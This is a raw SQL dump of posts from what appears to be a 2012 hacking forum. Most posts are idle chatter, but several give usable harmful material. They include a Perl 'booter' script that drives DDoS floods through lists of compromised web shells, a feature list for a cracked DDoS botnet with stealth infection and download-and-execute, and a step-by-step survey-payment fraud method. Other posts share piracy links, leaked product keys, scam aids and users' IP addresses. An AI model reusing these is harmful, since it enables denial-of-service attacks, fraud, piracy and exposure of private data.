'Now before I start, I just wanna say that these logos were for a PS3 CoD Clan called TheEliteHitmen3H.\r\nThey have a Youtube Channel with some interesting videos and also some very nice and MLG members. :p\r\n\r\nThey are currently working on a Sniper Montage or Montage itself and it will be released sometime by the end of the year or month.\r\n\r\nLink to their YT channel:\r\nhttp://www.youtube.com/user/THEELITEHITMEN3H\r\n\r\nPlease subscribe as it will help them out a lot :)\r\n\r\nAnyways,\r\nHere are the logos I made for them.\r\nPlease give me your feedback and opinion and rates?\r\nAnd pick one they should use?\r\n\r\n[img]http://i.imgur.com/gdasM.png[/img]\r\n[img]http://i.imgur.com/cG61f.png[/img]\r\n[img]http://i.imgur.com/5jrXo.png[/img]\r\n[img]http://i.imgur.com/9v0VG.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6ede888dfa0f6167e48f9e825638c8b6', '0', '0'); INSERT INTO mybb_posts VALUES('7134', '1207', '7133', '35', 'RE: Rate these logos', '0', '62', 'R?????zo?', '1352243188', 'I like the first and the last one.\nthe other are just too simple.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8a600a8d865cc71d108f303714dad2fa', '0', '0'); INSERT INTO mybb_posts VALUES('7135', '1204', '7132', '3', 'RE: We are L33T', '0', '1', 't3h jok3r', '1352243595', '[quote=\'Jacob\' pid=\'7132\' dateline=\'1352238599\']\r\nYep, this is pretty awesome. I contributed like 20 of them :D\r\n[/quote]\r\n\r\n20? You have 18 umm and are you sure all 18 were in the off topic section?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '43d58f041f7c89bf06c3333cf3f3053b', '0', '0'); INSERT INTO mybb_posts VALUES('7136', '1207', '7133', '35', 'RE: Rate these logos', '0', '82', 'iTzIpod', '1352243960', 'Thanks for your feedback. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dee7430e1477e1954ca7c219342baf1d', '0', '0'); INSERT INTO mybb_posts VALUES('7137', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1352244040', '/me is upset because I have to do my homework but can\'t wait to see who wins the election.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3042154fedcc1b51e5e3be472e76ee62', '0', '0'); INSERT INTO mybb_posts VALUES('7138', '1190', '7004', '3', 'RE: New Rule', '0', '4', 'Triple H', '1352244228', 'Great news now i feel safe sharing my content', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5fd9b94c9f031ef23d10a965f211d01a', '0', '0'); INSERT INTO mybb_posts VALUES('7139', '1190', '7113', '3', 'RE: New Rule', '0', '1', 't3h jok3r', '1352244342', '[quote=\'R?????zo?\' pid=\'7113\' dateline=\'1352216450\']\r\nAny way to remove the \"[lock]\" tags after the user have posted, it seems like the tags keep being there even though we post, this is not annoying but should be easy to fix, just a minor bug\r\n[/quote]\r\n\r\nThat\'s most likely because you are a Moderator (Unique Forum), if you post you should only see the content and not the tags with the content.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8fe9df5c3b53e4235de06d9d1259970a', '0', '0'); INSERT INTO mybb_posts VALUES('7140', '1207', '7133', '35', 'RE: Rate these logos', '0', '1', 't3h jok3r', '1352244494', 'I like the first one. I would give it 9.5/10, I\'m subtracting 0.5 points because the bottom of the text is kinda hard to see as good as invisible.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'de081c7f9203ca194487d246ea4fcecb', '0', '0'); INSERT INTO mybb_posts VALUES('7141', '1207', '7133', '35', 'RE: Rate these logos', '0', '82', 'iTzIpod', '1352245932', 'Aha I noticed that just now. :p\nThanks for your feedback.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '061aaa9e833ccf3533a0ffff93c85d41', '0', '0'); INSERT INTO mybb_posts VALUES('7142', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352245965', '/me just remembered about the election. :p Hoping Obama wins xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fbf077f5ba0c7013c04c9c77469fe880', '0', '0'); INSERT INTO mybb_posts VALUES('7143', '1207', '7133', '35', 'RE: Rate these logos', '0', '257', 'XxTREYZxX', '1352248227', 'The first one is awesome.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '59a485819b821ceafe2c70ed9abe2d1d', '0', '0'); INSERT INTO mybb_posts VALUES('7144', '1190', '7004', '3', 'RE: New Rule', '0', '257', 'XxTREYZxX', '1352248329', 'Vouch for this.\nThis is what we really need,Great work joker.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '61588a23773ad45a833308825f3fdfac', '0', '0'); INSERT INTO mybb_posts VALUES('7145', '1204', '7084', '3', 'RE: We are L33T', '0', '257', 'XxTREYZxX', '1352248506', 'Great work L33T,keep up the great work guys.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '94c1958cec04a815db35b38358610ffc', '0', '0'); INSERT INTO mybb_posts VALUES('7146', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '257', 'XxTREYZxX', '1352248612', 'Thanks for this but will not be needing this.\nnice giveaway though.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'a764b55d700c16d9cdb7a5cdcd8bdee6', '0', '0'); INSERT INTO mybb_posts VALUES('7147', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '257', 'XxTREYZxX', '1352248656', 'Thanks i really need this thanks man.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '2a9a39bd7a50db30064494038d226d72', '0', '0'); INSERT INTO mybb_posts VALUES('7148', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '257', 'XxTREYZxX', '1352248726', 'Agreed with Ipod.\nplease close this thread', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '9740eb1e07d4c55c1f64a301357d4117', '0', '0'); INSERT INTO mybb_posts VALUES('7149', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '257', 'XxTREYZxX', '1352248867', 'Hope this is worth posting ahah.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '64b971d4d88ed29a80110cb94dea2c08', '0', '0'); INSERT INTO mybb_posts VALUES('7150', '1197', '7050', '4', 'RE: Perfection', '0', '257', 'XxTREYZxX', '1352248960', 'Welcome and enjoy your stay.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '747818a81cea1569f53f78ed048ba3cf', '0', '0'); INSERT INTO mybb_posts VALUES('7151', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '257', 'XxTREYZxX', '1352249079', 'I won guys whooo.\nThanks you peeps.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '8075f75562ed71b7c1c72a46526189d2', '0', '0'); INSERT INTO mybb_posts VALUES('7152', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352249187', 'Banned for the great sig.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'ec5fe7472ac88c527a3eb6fba2f9aec8', '0', '0'); INSERT INTO mybb_posts VALUES('7153', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1352249259', '9/10 \nBecause i can see it now.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '10bfdf652b79e82e739b8ed3aad39012', '0', '0'); INSERT INTO mybb_posts VALUES('7154', '253', '1106', '56', 'RE: Count to 200', '0', '257', 'XxTREYZxX', '1352249347', '59.\n/me this is gonna take forever.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '6208bc740bbc35c18acfccc99a0b12bd', '0', '0'); INSERT INTO mybb_posts VALUES('7155', '1120', '6523', '19', '[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '1', 't3h jok3r', '1352249456', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('7156', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '62', 'R?????zo?', '1352254157', 'im sure it\'s worth :P but let me know', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6664fac9ca018c26915abe35d30f1fa3', '0', '0'); INSERT INTO mybb_posts VALUES('7157', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '62', 'R?????zo?', '1352254351', '10/10 because your avatar is awesome haha, had me staring for like 2min', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '03ffc48e228acf3ab8784b8ae001a1cb', '0', '0'); INSERT INTO mybb_posts VALUES('7158', '1207', '7133', '35', 'RE: Rate these logos', '0', '82', 'iTzIpod', '1352254920', 'Thanks for your feedback Trey :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e94e5aa842a4ccd20e6bd1bfec4933de', '0', '0'); INSERT INTO mybb_posts VALUES('7159', '1204', '7084', '3', 'RE: We are L33T', '0', '82', 'iTzIpod', '1352254966', 'I\'ve contributed a lot to that section! :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '826db99373bb3efe56b0ce243556d3e8', '0', '0'); INSERT INTO mybb_posts VALUES('7160', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1352255050', '10/10 anime chicks are nice.\nI\'d tap that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3e3110aac58cf57991ac751f4f1bbf70', '0', '0'); INSERT INTO mybb_posts VALUES('7161', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352255094', 'What signature? Lol\nMy signature is crap', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c795dac2b91c6280397fe348818a1acf', '0', '0'); INSERT INTO mybb_posts VALUES('7162', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352255125', 'Thanks for posting everyone, but I\'ve won. No need to post anymore.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e95e225bd67aff27eaea58c865a48dd3', '0', '0'); INSERT INTO mybb_posts VALUES('7163', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1352255159', '60. Almost there guys. Almost there...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a724897feae86aeda64f0c0cd58c4460', '0', '0'); INSERT INTO mybb_posts VALUES('7164', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '82', 'iTzIpod', '1352255308', '@t3h jok3r, you should add credits to the OP who made those threads \n\n\n\nCredits to \n@iTzIpod (Me)\n@Timmy\n@spacefish36', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ccd50e7c5b821b7a7835a1468e27b9f3', '0', '0'); INSERT INTO mybb_posts VALUES('7165', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '5', 'Timmy', '1352256370', 'We reached 7,000 posts on the election day.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '21095edf7c52bacca56726d4d70608ce', '0', '0'); INSERT INTO mybb_posts VALUES('7166', '1208', '0', '9', 'Steady $8 a Day [EXPLOIT]', '0', '5', 'Timmy', '1352257163', 'I have not tried this method therefore, I can not confirm it for you guys. If you guys do attempt this, feel free to post feedback! ^.^\r\n\r\n[lock]PS: It work certain for US, possibly CA/UK\r\n\r\nHow to make a quick 8$ a day {Atleast}\r\nThe GPT Daily Survey Exploit\r\n\r\nIn this guide, I will be teaching you how to use a URL exploit to make money in less than a\r\nminute. This has to be the simplest way to get free cash I know, and I’ve made over $150+ using\r\nthis trick over the years. If I used it everyday, it would probably add up to $500+ since I found\r\nout about it. On to the guide..\r\n\r\nFirst, login to the GPT website of your choice. I recommend http://www.prizelive.com/ or http://www.cashle.com/ Once you’re logged onto the GPT of your choice, head over to the offers and choose the\r\ncategory ‘Daily Surveys.’ Once you are there, look for any of the following offers:\r\n\r\nOpinions Here\r\n\r\nLucky Surveys\r\n\r\nIDz Surveys\r\n\r\nOpinion Surveys\r\n\r\nMyThoughtsCount\r\n\r\nGiveUsYour2Cents\r\n\r\nAmp Surveys\r\n\r\nThere are two different exploits, for the two different sets of offers. The first one I will be showing you\r\nworks on Lucky Surveys, IDz Surveys, Opinion Surveys, and GiveUsYour2Cents. \r\n\r\nStep 1.) Open up the offer, you should be taken to an average looking survey site.\r\n\r\nThe URL should say something along the lines of: \r\nhttp://...............aspx?pgtid=19\r\n\r\nThis exploit is SIMPLE, just simply change the number right after ?pgtid= (Usually 19) to 23 and\r\nwhen the next page loads, mark it as complete. It should approve shortly afterwards. Just saved\r\nyourself a lot of time, seeing as a lot of the time you take a 40 minute survey and do not qualify.\r\n\r\nMAKE SURE TO CLEAR YOUR COOKIES AFTER EACH OFFER!\r\n\r\nNow on to the other dailies. (Opinions Here, MyThoughtsCount, and AmpSurveys)\r\n\r\nThese are usually the higher paying daily surveys. This exploit is a bit trickier, but can still be\r\ndone with ease.\r\n\r\nFill out your info until you start the survey, or the url says something similar to this: \r\n\r\n[code]http://www.opinionshere.com/SurveyFrame.aspx?user_id=%2fuFV6uCf0nl6zvdpcW6TPw%3d%[/code]\r\n\r\nSee the part user_id=? Copy everything after the = sign and paste it in a blank notepad\r\ndocument or something similar. Now copy this link:\r\n\r\n[code]http://www.opinionshere.com/SurveyThankyou.aspx?survey_id=GbyvriN8jLs%3d&user_id=Yy9kGteElC6aCwcRFMqcKw%3d%3d[/code]\r\n\r\nPaste that in your URL box, but do not hit Enter or Go, instead, go back to the notepad\r\ndocument or what ever you used and copy the user ID you pasted there. Paste it into the URL\r\nbox after user_id=\r\n\r\nHit enter, wait for the page to load, and mark as complete.\r\n\r\nHope you enjoy your free money![/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cd692cd384f7153f470c0d3eb5bb9e90', '0', '0'); INSERT INTO mybb_posts VALUES('7167', '1209', '0', '15', 'WinRAR cracked', '0', '5', 'Timmy', '1352257356', 'Hey...\n\n\nI bet you all are sick of seeing the \"Evaluation Version\" box everytime you open WinRAR, so many of you went to 7Zip or something like that...\n\n\n[align=center][size=x-large][b]That\'s why I bring you...\n\n\n[spoiler]THE WINRAR CRACK!!![/spoiler][/b][/size][/align]\n\n\nYou can download it from:\n\n[lock][url=http://adf.ly/E0HtU]DOWNLOAD[/url][/lock]\n\n[align=center][size=x-large][b]AV Scans[/b][/size][/align]\n\n[url=http://adf.ly/E28WL]AV scan 1[/url]\n[url=http://adf.ly/E28ee]AV scan 2[/url]\n[url=http://adf.ly/E28hf]AV scan 3[/url]\n[url=http://adf.ly/E28k6]AV scan 4[/url]', '72.231.24.165', '1223104677', '1', '0', '5', '1352530815', '1', 'e825065623bea7d66d2691e00465dd6a', '0', '1352530815'); INSERT INTO mybb_posts VALUES('7168', '1210', '0', '21', '[Cracked] Dark DDoSer', '0', '5', 'Timmy', '1352257552', 'Here I have Dark DDoSeR 5.1 Cracked by The Old Warrior run at your own risk\r\n[img]http://img5.imageshack.us/img5/2596/8dcebcb1852e4d37a7adeaa.png[/img]\r\n\r\n\r\n\r\n[color=#FF0000]Client Features[/color]\r\n[spoiler]\r\n[-] Menu\r\n[+] Multi-Listen Socket Feature (Any Port)\r\n[+] Select # (Selects custom number of zombies)\r\n[+] Find IP (Locates and selects the IP in the listview)\r\n[+] Friends List (Keep yourself organized on who is truly your friend or foe)\r\n[+] DDoS History (Automatically keeps your victims saved)\r\n[+] Server Build (Create your server with personal settings)\r\n[++] Connect\r\n[+++] Host/DNS (DynDNS, no-ip, etc)\r\n[+++] Port (Chose any Port for server to connect)\r\n[+++] Reconnect Interval (sec)\r\n[+++] Registry Key (Startup)\r\n[+++] Registry Value (Startup)\r\n[+++] Mutex (Keep your server.exe from running again at the same time!)\r\n[+++] UPX Compression (Compress your .exe 60% smaller than normal size!)\r\n[++] Build\r\n[+++] Download server.exe\r\n[+] Options\r\n[++] Listview\r\n[+++] Change (.bmp) (Changes listview background to personal backgrounds)\r\n[+++] Remove (.bmp) (Choose to have no background in listview)\r\n[+++] Add/Remove Gridlines\r\n[+++] Color\r\n[++++] ForeColor (Change to custom color)\r\n[++++] BackColor (Change to custom color)\r\n[++] Form\r\n[+++] Theme\r\n[++++] Browse... (Change Theme of Client - Over 100 themes)\r\n[++++] Remove (Remove the theme - Compatible with Linux Wine)\r\n[+++] Text\r\n[++++] Font (Change to personal font)\r\n[++++] ForeColor (Change to custom color)\r\n[++++] BackColor (Change to custom color)\r\n\r\n[-] Commands\r\n[++] Show DNS (Show what DNS the server connects to)\r\n[++] DL/Execute (Download and execute a file on victim)\r\n[++] Update (Download and execute a file on victim, then uninstall)\r\n[++] Restart (Restart server - using temporary, auto-generated mutex)\r\n[++] Re-connect (Re-establishes connection with server)\r\n[++] Close (Exits process of server, does not remove registry)\r\n[++] Uninstall (Remove registry and disconnect server)\r\n\r\n[-] DDoS\r\n[+] Multi-threaded UDP Flood\r\n[+] SSYN Flood\r\n[+] HTTP Flood\r\n-> IP Address (Chose the host for attack)\r\n-> Port (Chose a custom Port)\r\n-> Type (Chose UDP or SSYN)\r\n-> Speed (Speed of attack)\r\n-> Size (Size of each Packet)\r\n-> Packets (Number of data sent)\r\n-> UDP Strength (Stable or Aggressive)\r\n-> Stop Timer (Automatically stop ddos after certain amount of seconds)\r\n-> Automatic Flood (floods in _ seconds, for _ seconds)\r\n-> Selected Only (Attack with only the selected zombies)\r\n--> Send Command (Start Attack)\r\n--> Stop Command (Stop Attack)\r\n\r\n[-] Statusbar (Located on bottom of client)\r\n[+] Status (Tells of lost connections, etc)\r\n[+] New Infections (Keeps track on # of new infections while client has been open)\r\n[+] Peak (Climax of zombies in listview)\r\n[+] Zombies Online\r\n[+] Time\r\n\r\n[-] Other\r\n[+] Works on all Windows (Including Vista, and Seven - Both 32 and 64 bit)\r\n[+] UAC Work-around (Won\'t prompt user - Registry -> Current User)\r\n[+] Stealth (Quietly runs on infected user\'s PC without prompt)\r\n[+] Ping Pong (Checks if the infected user is still responsive)\r\n[+] Instant Response (Infected users respond instantly)\r\n[+] Lifetime Membership and Updates!\r\n[+] Instant Access (As soon as you purchase, you will recieve access to Portal)\r\n[+] Membership to Portal (Change DNS, Serial, Password, etc)\r\n[+] ONLY $25!\r\n[+] Sleek GUI Change!\r\n[+] Cryptable **\r\n[+] Strong, Reliable DDOS\r\n[+] 37.5 KB Stub; When compressed = 19.5 KB\r\n[/spoiler]\r\n\r\n[lock]\r\n\r\n[color=#00BFFF]vScan:[/color][url=http://adfoc.us/7778111152521]vScan for all you NOOBS[/url]\r\n\r\n[color=#1E90FF]Anubis Scan:[/color] [url=http://adfoc.us/7778111151733]Swag you are BlueDream[/url]\r\n\r\n[color=#0000CD]Download:[/color] [url=http://adfoc.us/7778111152467]Say Thanks :)[/url]\r\n\r\n[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '03ea88246d14a7819e4566bc3a257ab7', '0', '0'); INSERT INTO mybb_posts VALUES('7169', '1188', '6999', '35', 'RE: [Crack] Adobe CS6 Programs', '0', '5', 'Timmy', '1352257694', 'Thanks for the download and virus reports, you should use the lock mycode.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b726792a9071474fae283ab1e0160a8f', '0', '0'); INSERT INTO mybb_posts VALUES('7170', '1211', '0', '18', 'Facebook Blaster Pro v10.0', '0', '5', 'Timmy', '1352257874', '[img]http://img6.imagebanana.com/img/73cmrgts/196461.jpg[/img]\n\n1.Extract File On Desktop.\n2.Install FaceBook Blaster Pro v10.0\n3.Put Serial Key\n\nInfo: http://www.facebookblaster.com/\nVirustotal 0/42: https://www.virustotal.com/file/d97ab210405d9f3bcc055cefd6a716b19fc9430ebc290074780196beb206a0db/analysis/\n\n[lock]\nDownload: http://www7.zippyshare.com/v/70995165/file.html\n\nKey:LBACLFJEJMF9EDIRFS64[/lock]', '72.231.24.165', '1223104677', '1', '0', '1', '1352526859', '1', '3214939519381b7795a6744fb88310db', '0', '1352526859'); INSERT INTO mybb_posts VALUES('7333', '1243', '0', '68', 'Simple Perl Booter', '0', '8', 'spacefish36', '1352527014', 'Headnote: I wrote this a while back for my friend with someones help. They recently tested it, found there were a few modules that need installation. I don\'t know what they are, they seem to vary depending on system.\r\n\r\n-- Start Content --\r\n\r\nI absolutely do not guarantee this to be in working condition.\r\n\r\nUsage:\r\n\r\nperl booter.pl 127.0.0.1 80 60 < shells.txt\r\n\r\n127.0.0.1 is host. Can be dns, shells don\'t care.\r\n80 is port. This is only used for \"tcp\" shells.\r\n60 is time. This is how long it boots for. This goes for a divisible of 10 seconds, so 55 would boot for 60 seconds.\r\nshells.txt is a file with all your shells, and is in the following format.\r\n\r\n[code]\r\ntcp;http://bot.fak/shell.php\r\nudp;http://udpbot.fak/shell.php\r\n[/code]\r\n\r\n\"tcp\" shells are ones that ask for a port, time, and host. \"udp\" shells don\'t ask for port.\r\n\r\nIf you need it adapted for additional use, such as shell booters (different from udp/tcp shells), putty booters, et al, just let me know.\r\n\r\nFollowing: The booter.pl file:\r\n\r\n[code]\r\n#!/usr/bin/perl\r\n\r\nuse strict;\r\nuse warnings;\r\nuse HTTP::Request::Common;\r\nuse HTTP::Request::Common::Post;\r\nuse POE;\r\nuse POE::Component::Client::HTTP;\r\n\r\nmy @shells;\r\n\r\nwhile (<STDIN>) {\r\n push @shells, $_;\r\n}\r\n\r\n$ip = $ARGV[0];\r\n$port = $ARGV[1];\r\n$time = $ARGV[2];\r\n\r\nif ($ip !~ m/.*?\\..*?\\..*?\\..*?/) {\r\n print \"ERROR: Must specify IP.\\n\";\r\n die;\r\n}\r\n\r\nif ($port !~ m/\\d*?/) {\r\n print \"ERROR: Must specify PORT.\\n\";\r\n die;\r\n}\r\n\r\nif (!$time) {\r\n $time = 15;\r\n}\r\n\r\nmy @udpshells;\r\nmy @tcpshells;\r\n\r\nforeach my $shell (@shells) {\r\n if ($shell =~ m/^udp;(.*)/) {\r\n push @udpshells, $1;\r\n } elsif ($shell =~ m/^tcp;(.*)/) {\r\n push @tcpshells, $1;\r\n }\r\n}\r\n\r\nmy @url_list;\r\n\r\nforeach my $shell (@udpshells) {\r\n @url_list = (@url_list, ( POST $shell, Content => [ ip => $ip, time => 10 ] ) );\r\n}\r\n\r\nforeach my $shell (@tcpshells) {\r\n @url_list = (@url_list, ( POST $shell, Content => [ host => $ip, port => $port, time => 10 ] ) );\r\n}\r\n\r\nPOE::Component::Client::HTTP->spawn(Alias => \'ua\');\r\n\r\nsub got_response {\r\n my ($heap, $request_packet, $response_packet) = @_[HEAP, ARG0, ARG1];\r\n\r\n my $http_request = $request_packet->[0];\r\n my $tag = $request_packet->[1];\r\n my $http_response = $response_packet->[0];\r\n\r\n my $response_string = $http_response->as_string();\r\n}\r\n\r\nsub _start {\r\n my $kernel = $_[KERNEL];\r\n\r\n foreach my $i (0 .. $#url_list) {\r\n $kernel->post(\"ua\" => \"request\", \"got_response\", $url_list[$i], $i);\r\n }\r\n $time -= 10;\r\n if ($time > 0) {\r\n $kernel->delay(_start => 10);\r\n }\r\n}\r\n\r\nPOE::Session->create(package_states => [main => [\"_start\", \"got_response\"]]);\r\n\r\n$poe_kernel->run();\r\n[/code]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '9b596b744f713a9f2b46a191ba4a5028', '0', '0'); INSERT INTO mybb_posts VALUES('7171', '1212', '0', '30', 'Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '5', 'Timmy', '1352258194', 'Here i have Floristbooter \r\n\r\nThread on HF: http://www.h@ckforums.net/showthread.php?tid=2709475\r\n\r\n[lock]\r\n[url=http://adf.ly/ETZPe]Click ME For Download[/url]\r\n\r\n[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77f8a2915d72e7d96f92dd89b1dd4782', '0', '0'); INSERT INTO mybb_posts VALUES('7172', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352258290', 'Good job L33tHacking! :D\nKeep up the activity. \nHoping Obama wins. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '88e499ea6e05774297f38b1e6bb928e3', '0', '0'); INSERT INTO mybb_posts VALUES('7173', '1213', '0', '34', 'Black Sleek Thread Design .PSD', '0', '9', 'p420', '1352258497', 'Preview:\r\n\r\n[img]http://i.imgur.com/5wMso.png[/img]\r\n\r\n[b]\r\n[color=#FF0000]Post to see link[/color][/b]\r\n\r\n[lock] http://adf.ly/ETZrU\r\n\r\nHave fun guys and if you download please thank the thread it helps:D[/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '06596a1a6de7d6b86e9e7836ebfc0d34', '0', '0'); INSERT INTO mybb_posts VALUES('7174', '1214', '0', '43', 'Tons of PIDs', '0', '9', 'p420', '1352258706', 'Enjoy the PIDs.\r\n\r\n[lock]Ipad 2\r\n\r\nDLXFF3HUDFJ0\r\nDLXFF3JKDFJ0\r\nDLXFF8KSDFJ0\r\nDLXFF6MFDFJ0\r\nDLXFF5SLDFJ0\r\nDLXFF9HQDFJ0\r\nDLXFF8HJDFJ0\r\nDLXFF0HYDFJ0\r\n\r\nIpod Touch 8GB\r\n\r\nCCQDL2MTDCP7\r\nCCQDL8CNDCP7\r\nCCQDL4BLDCP7\r\nCCQDL6MKDCP7\r\nCCQDL5PCDCP7\r\nCCQDL1HADCP7\r\nCCQDL1KNDCP7\r\n\r\nXbox 360 America\r\n\r\n15558444870305\r\n15405744902305\r\n15603043745305\r\n15329625386305\r\n15575873936305\r\n15162942002305\r\n\r\nXbox 360 Europe\r\n\r\n02758574483705\r\n02684251870705\r\n02794173541705\r\n02602104088705\r\n02653397205705\r\n02964709008705\r\n02807886700705\r\n\r\nLogitech G15\r\n\r\nBT23XGDG\r\nBT25RQDG\r\nBT77SHDG\r\nBT82RWDG\r\nBT22INDG\r\nBT35FODG\r\n\r\n[/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '940edb3f1f62231fa8e8df6dfd19ac33', '0', '0'); INSERT INTO mybb_posts VALUES('7175', '1215', '0', '3', 'Post/PM Allowed for ACCOUNTS Only.', '0', '61', 'NXK', '1352258731', 'We have come to conclusion that it\'s only fair for accounts to be shared via the post/PM Method. The rule still stands for everything ELSE. We do not allow post/pm for methods/programs ETC. But for account giveaways We agreed that it\'s only fair to do so to prevent Leeching of accounts.', '99.252.235.12', '1677519628', '1', '0', '61', '1352258805', '1', 'ae4d159e4f3ecdfceb17f38703c2f114', '0', '1352258805'); INSERT INTO mybb_posts VALUES('7176', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '61', 'NXK', '1352258763', 'http://l33thacking.net/thread-1215.html', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '34cea18f252a0255e727402093d67a0d', '0', '0'); INSERT INTO mybb_posts VALUES('7177', '1216', '0', '52', '[Release]Skype Resolver & GeoIP', '0', '9', 'p420', '1352259453', '[img]http://imgf.tw/503225830.png[/img]\r\n\r\n\r\nThis is a Skype Resolver & GeoIP that I just made in Visual Studio for another site and thought it wouldn\'t be problem if I share it here too.\r\n\r\n[lock][url=http://www.mediafire.com/?esdealkfo76undz][img]http://imgf.tw/442197003.png[/img][/url][/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0366caf048410e3bc2341b2e2f0bb98d', '0', '0'); INSERT INTO mybb_posts VALUES('7178', '1217', '0', '29', 'Win all paypal disputes!', '0', '1', 't3h jok3r', '1352259809', 'Though this one should be useful.\r\n\r\n[lock]\r\n[url=http://www.mediafire.com/view/?61e8z951opypfx4]Click here.[/url]\r\n[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '429bb7d94abf9e262ed03bb82acb8b24', '0', '0'); INSERT INTO mybb_posts VALUES('7179', '1218', '0', '17', 'Camdecoy bitch available here', '0', '8', 'spacefish36', '1352260040', '[align=center] [b] [size=medium] Blonde Girl\r\n\r\nPicture:\r\n\r\nhttp://img526.imageshack.us/img526/2583/99699514.png\r\n\r\nDownload: \r\n\r\n[lock]\r\n[url]http://adf.ly/ETbVP[/url]\r\n[/lock][/size][/b][/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ff79c1bc42630fc341b9ad38f5cb1ca1', '0', '0'); INSERT INTO mybb_posts VALUES('7180', '1219', '0', '44', 'FIFA 13 Receipt', '0', '1', 't3h jok3r', '1352260181', 'Not sure how useful this will be to you guys, but if you want to try SE\'ing EA into a free copy of FIFA 13/Ultimate Edition, here\'s a real receipt you guys can use... :)\r\n\r\n[lock]http://www.mediafire.com/view/?y22wv5ilg012b56[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2255159c7b5a016904ad4d29bbf5b901', '0', '0'); INSERT INTO mybb_posts VALUES('7181', '1195', '7176', '47', 'RE: Premium Minecraft Accounts', '0', '324', 'Purps™', '1352263004', '[quote=\'NXK\' pid=\'7176\' dateline=\'1352258763\']\r\nhttp://l33thacking.net/thread-1215.html\r\n[/quote]\r\n\r\nI\'m not using Post and PM me, I PM them.\n[hr]\n[quote=\'iTzIpod\' pid=\'7131\' dateline=\'1352236739\']\r\nYou haven\'t PMed me yet :p\r\n[/quote]\r\n\r\nSorry, I Pmed you. :)\n[hr]\n[quote=\'VirtualLegend\' pid=\'7120\' dateline=\'1352230420\']\r\nI Want to join this giveaway, need a MC account :D\r\n[/quote]\r\n\r\nPMed you also! :)', '67.181.154.90', '1135975002', '0', '0', '324', '1352263097', '1', '868b4f651daeb23acbf5729e424713df', '0', '0'); INSERT INTO mybb_posts VALUES('7182', '1196', '7070', '7', 'RE: Your favorite time of the year?', '0', '205', 'mothered', '1352263500', '[quote=\'R?????zo?\' pid=\'7070\' dateline=\'1352191916\']\r\nWell my favourite time in the year is December (Yeah I know it\'s a month) but that\'s me and my gf\'s birthday with X-mas and New Year, it\'s just a full month partying 